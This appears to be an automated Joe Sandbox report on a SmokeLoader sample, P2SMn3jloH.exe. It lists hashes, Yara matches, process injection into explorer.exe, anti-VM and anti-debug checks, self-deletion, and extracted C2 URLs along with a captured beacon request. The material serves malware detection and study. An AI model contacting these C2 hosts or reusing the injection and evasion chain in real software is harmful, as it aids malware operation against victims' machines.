Edit tour

Windows Analysis Report
P2SMn3jloH.exe

Overview

General Information

Sample Name:	P2SMn3jloH.exe
Analysis ID:	736951
MD5:	0779f7b34e9079944427b8260b49c205
SHA1:	31f2cf1dc970fdfaf51b9aab2c9e0b9715fb53ec
SHA256:	5c7ff5f2993bdb60d15a567dfaef41dcd30875d6629f2775acdb190e01dcef87
Tags:	exeSnakeKeylogger
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Injects a PE file into a foreign processes

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Contains functionality to inject code into remote processes

Deletes itself after installation

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found evaded block containing many API calls

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

P2SMn3jloH.exe (PID: 4020 cmdline: C:\Users\user\Desktop\P2SMn3jloH.exe MD5: 0779F7B34E9079944427B8260B49C205)

P2SMn3jloH.exe (PID: 3420 cmdline: C:\Users\user\Desktop\P2SMn3jloH.exe MD5: 0779F7B34E9079944427B8260B49C205)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

utisvaa (PID: 1280 cmdline: C:\Users\user\AppData\Roaming\utisvaa MD5: 0779F7B34E9079944427B8260B49C205)

utisvaa (PID: 5332 cmdline: C:\Users\user\AppData\Roaming\utisvaa MD5: 0779F7B34E9079944427B8260B49C205)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.395157811.00000000006D8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5218:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.254069978.00000000005E9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x4fb0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.P2SMn3jloH.exe.21b15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
1.2.P2SMn3jloH.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.0.utisvaa.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.0.utisvaa.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.0.utisvaa.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.2.utisvaa.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.utisvaa.21a15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Click to see the 2 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: P2SMn3jloH.exe	ReversingLabs: Detection: 46%
Source: P2SMn3jloH.exe	Virustotal: Detection: 34%			Perma Link

Antivirus detection for URL or domain

Source: http://host-host-file8.com/

URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: host-file-host6.com	Virustotal: Detection: 17%			Perma Link
Source: host-host-file8.com	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\utisvaa	ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Roaming\utisvaa	Virustotal: Detection: 34%			Perma Link

Machine Learning detection for sample

Source: P2SMn3jloH.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\utisvaa

Joe Sandbox ML: detected

Source: 13.0.utisvaa.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.utisvaa.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.utisvaa.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.utisvaa.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Source: P2SMn3jloH.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: C:\jexagiyad51\fuzuniguxoloyi55\nohacagepak\zevoluril\suy.pdb source: P2SMn3jloH.exe, utisvaa.2.dr
Source:	Binary string: (C:\jexagiyad51\fuzuniguxoloyi55\nohacagepak\zevoluril\suy.pdb@ source: P2SMn3jloH.exe, utisvaa.2.dr

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe	Domain query: host-host-file8.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://host-file-host6.com/
Source: Malware configuration extractor	URLs: http://host-host-file8.com/

Source: Joe Sandbox View

ASN Name: RISS-ASRU RISS-ASRU

Source: Joe Sandbox View

IP Address: 87.251.79.60 87.251.79.60

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcihclar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: host-file-host6.com

Source: unknown

DNS traffic detected: queries for: host-file-host6.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.P2SMn3jloH.exe.21b15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.P2SMn3jloH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.utisvaa.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.utisvaa.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.utisvaa.21a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.395157811.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.254069978.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: P2SMn3jloH.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.395157811.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.254069978.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_0041A8B0	0_2_0041A8B0
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_0040E970	0_2_0040E970
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00419918	0_2_00419918
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_004139A7	0_2_004139A7
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00414250	0_2_00414250
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00414A7C	0_2_00414A7C
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00419220	0_2_00419220
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00418CDC	0_2_00418CDC
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_0041B481	0_2_0041B481
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_0041465C	0_2_0041465C
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00413E7C	0_2_00413E7C
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_00418798	0_2_00418798

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Code function: String function: 0040EF38 appears 38 times

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_021B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,	0_2_021B0110
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 1_2_0040180C Sleep,NtTerminateProcess,	1_2_0040180C
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 1_2_00401818 Sleep,NtTerminateProcess,	1_2_00401818
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 1_2_00401822 Sleep,NtTerminateProcess,	1_2_00401822
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 1_2_00401826 Sleep,NtTerminateProcess,	1_2_00401826
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 1_2_00401834 Sleep,NtTerminateProcess,	1_2_00401834
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 12_2_021A0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,	12_2_021A0110
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 13_2_0040180C Sleep,NtTerminateProcess,	13_2_0040180C
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 13_2_00401818 Sleep,NtTerminateProcess,	13_2_00401818
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 13_2_00401822 Sleep,NtTerminateProcess,	13_2_00401822
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 13_2_00401826 Sleep,NtTerminateProcess,	13_2_00401826
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 13_2_00401834 Sleep,NtTerminateProcess,	13_2_00401834

Source: P2SMn3jloH.exe	Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: utisvaa.2.dr	Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: P2SMn3jloH.exe	ReversingLabs: Detection: 46%
Source: P2SMn3jloH.exe	Virustotal: Detection: 34%

Source: P2SMn3jloH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\P2SMn3jloH.exe C:\Users\user\Desktop\P2SMn3jloH.exe
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Process created: C:\Users\user\Desktop\P2SMn3jloH.exe C:\Users\user\Desktop\P2SMn3jloH.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\utisvaa C:\Users\user\AppData\Roaming\utisvaa
Source: C:\Users\user\AppData\Roaming\utisvaa	Process created: C:\Users\user\AppData\Roaming\utisvaa C:\Users\user\AppData\Roaming\utisvaa
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Process created: C:\Users\user\Desktop\P2SMn3jloH.exe C:\Users\user\Desktop\P2SMn3jloH.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Process created: C:\Users\user\AppData\Roaming\utisvaa C:\Users\user\AppData\Roaming\utisvaa	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\utisvaa

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/2@4/1

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Code function: 0_2_00405467 SetLastError,GetTickCount,LoadLibraryA,AreFileApisANSI,GetNamedPipeHandleStateW,InterlockedIncrement,EnterCriticalSection,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedExchange,GetPrivateProfileStructA,EnterCriticalSection,InterlockedCompareExchange,EnumCalendarInfoA,LocalUnlock,CancelDeviceWakeupRequest,GetComputerNameW,EnterCriticalSection,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,InterlockedIncrement,GetCharWidthA,SetThreadToken,MoveFileWithProgressA,FindNextVolumeA,GetModuleHandleA,CreateActCtxW,VerifyVersionInfoA,InterlockedDecrement,InterlockedIncrement,MoveFileWithProgressA,WriteConsoleW,GlobalFindAtomW,LoadLibraryW,MoveFileWithProgressA,SetProcessAffinityMask,GetACP,DefineDosDeviceW,GetDiskFreeSpaceExW,InterlockedExchange,GetPrivateProfileStructW,LockFile,_lread,ReadConsoleInputW,GetPrivateProfileIntA,OpenJobObjectW,GetTapeParameters,GetMailslotInfo,CopyFileW,GetSystemWindowsDirectoryA,OpenFileMappingA,GetConsoleAliasesLengthA,SetFileTime,

0_2_00405467

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Code function: 0_2_00405224 CallNamedPipeA,GetThreadPriority,SearchPathA,OpenEventA,FindResourceW,GetVersionExA,SetWaitableTimer,CopyFileW,WriteConsoleInputA,SizeofResource,GlobalDeleteAtom,lstrlenW,GetModuleHandleA,GetWindowsDirectoryA,MapViewOfFileEx,GlobalGetAtomNameA,DebugBreak,LocalUnlock,VerifyVersionInfoW,

0_2_00405224

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Command line argument: PpA

0_2_00416FA0

Source: P2SMn3jloH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\jexagiyad51\fuzuniguxoloyi55\nohacagepak\zevoluril\suy.pdb source: P2SMn3jloH.exe, utisvaa.2.dr
Source:	Binary string: (C:\jexagiyad51\fuzuniguxoloyi55\nohacagepak\zevoluril\suy.pdb@ source: P2SMn3jloH.exe, utisvaa.2.dr

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_004088F4 push eax; ret	0_2_00408912
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_0040A483 push ecx; ret	0_2_0040A496
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_0040EF7D push ecx; ret	0_2_0040EF90
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_021B1970 push ebx; iretd	0_2_021B19B7
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_021B1977 push ebx; iretd	0_2_021B19B7
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 0_2_021B198B push ebx; iretd	0_2_021B19B7
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 1_2_004011D0 push ebx; iretd	1_2_00401217
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 1_2_004011D7 push ebx; iretd	1_2_00401217
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Code function: 1_2_004011EB push ebx; iretd	1_2_00401217
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 12_2_021A198B push ebx; iretd	12_2_021A19B7
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 12_2_021A1970 push ebx; iretd	12_2_021A19B7
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 12_2_021A1977 push ebx; iretd	12_2_021A19B7
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 13_2_004011D0 push ebx; iretd	13_2_00401217
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 13_2_004011D7 push ebx; iretd	13_2_00401217
Source: C:\Users\user\AppData\Roaming\utisvaa	Code function: 13_2_004011EB push ebx; iretd	13_2_00401217

Source: C:\Users\user\Desktop\P2SMn3jloH.exe

Code function: 0_2_00417194 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_00417194

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\utisvaa

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\utisvaa

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\p2smn3jloh.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\utisvaa:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: utisvaa, 0000000D.00000002.408489516.00000000001FB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\P2SMn3jloH.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utisvaa	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 2436	Thread sleep count: 627 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1172	Thread sleep count: 340 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1172	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2680	Thread sleep count: 355 > 30	Jump to behavior
